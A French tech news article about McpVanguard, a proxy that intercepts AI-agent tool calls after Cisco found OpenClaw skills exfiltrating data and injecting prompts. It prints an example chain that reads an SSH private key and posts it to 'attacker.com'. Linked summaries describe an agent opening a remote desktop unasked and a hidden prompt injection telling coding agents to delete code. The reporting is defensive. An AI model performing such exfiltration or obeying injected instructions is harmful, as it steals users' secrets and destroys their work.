Le proxy McpVanguard bloque l'exfiltration des données de compétence OpenClaw

En réponse à la découverte par l'équipe de sécurité IA de Cisco de compétences tierces OpenClaw effectuant une exfiltration silencieuse de données et une injection d'invite, un développeur a publié McpVanguard, un proxy conçu pour s'interposer entre un agent d'IA et ses outils afin de bloquer les appels malveillants avant leur exécution.
Le problème : les appels malveillants en chaîne
Le problème de sécurité n'est pas un bogue dans OpenClaw lui-même, mais une conséquence du fait que les agents ont un accès au système de fichiers, une exécution de shell et des appels réseau sans limites d'application. Les tests de Cisco ont révélé un schéma où des appels individuels apparemment inoffensifs se combinent pour créer une violation, comme :
read_file("~/.ssh/id_rsa") → http_post("attacker.com", contents)Aucun appel ne semble malveillant isolément, mais ensemble, ils exfiltrent des données sensibles. Selon la source, ClawHub comptait plus de 820 compétences malveillantes à son apogée, et CVE-2026-25253 permettait aux attaquants d'obtenir une exécution de code à distance via un seul lien malveillant. La validation actuelle au niveau des compétences ne parvient pas à détecter ces séquences d'appels en chaîne.
La solution : le proxy McpVanguard
McpVanguard aborde ce problème en interceptant les appels entre l'agent et ses outils. Il utilise trois méthodes de détection :
- Correspondance de motifs
- Évaluation de l'intention sémantique
- Détection des chaînes comportementales sur l'ensemble de la session
L'installation se fait via pip : pip install mcp-vanguard.
Couche plus profonde : le protocole VEX
Le projet inclut une couche de sécurité plus profonde appelée protocole VEX, décrite comme un système « enregistreur de vol ». Il fournit :
- Des pistes d'audit Merkle pour une journalisation résistante à la falsification
- Une vérification d'identité de l'agent ancrée dans un TPM
- Une application au niveau des appels système
Le protocole VEX est construit en Rust et son développement a commencé en décembre 2023, avant qu'OpenClaw ne gagne en popularité. La source note que NVIDIA a récemment livré NemoClaw pour des objectifs de sécurité similaires, indiquant que ce type de menace ne va pas disparaître.
Les deux projets sont disponibles sur GitHub :
📖 Read the full source: r/openclaw
👀 See Also

Isolement des agents IA avec WebAssembly : Autorité zéro par défaut
Cosmonic soutient que le sandboxing traditionnel (seccomp, bubblewrap) échoue pour les agents IA à cause de l'autorité ambiante. Le modèle basé sur les capacités de WebAssembly accorde zéro autorité par défaut, nécessitant des importations explicites pour le système de fichiers, le réseau ou les identifiants.

Claude Code initie une connexion de bureau à distance sans saisie de l'utilisateur
Un utilisateur de Claude Code rapporte que l'agent IA a déclenché une connexion Bureau à distance Windows et navigué dans des dossiers sans intervention, soulevant de sérieuses préoccupations de sécurité concernant les autorisations des outils d'IA.

Pourquoi les outils de RAG interne et de chat-document échouent aux audits de sécurité
La communauté discute des obstacles réels en matière de sécurité et de conformité qui empêchent les outils RAG d'atteindre la production.

jqwik v1.10.0 glisse une injection de prompt qui supprime du code lorsqu'il est utilisé par des agents IA
Johannes Link a ajouté une instruction cachée à jqwik v1.10.0 qui ordonne aux agents de codage IA de supprimer tous les tests et le code jqwik, dissimulée avec des séquences d'échappement ANSI. Claude la détecte correctement, mais les utilisateurs humains pourraient ne pas avoir cette chance.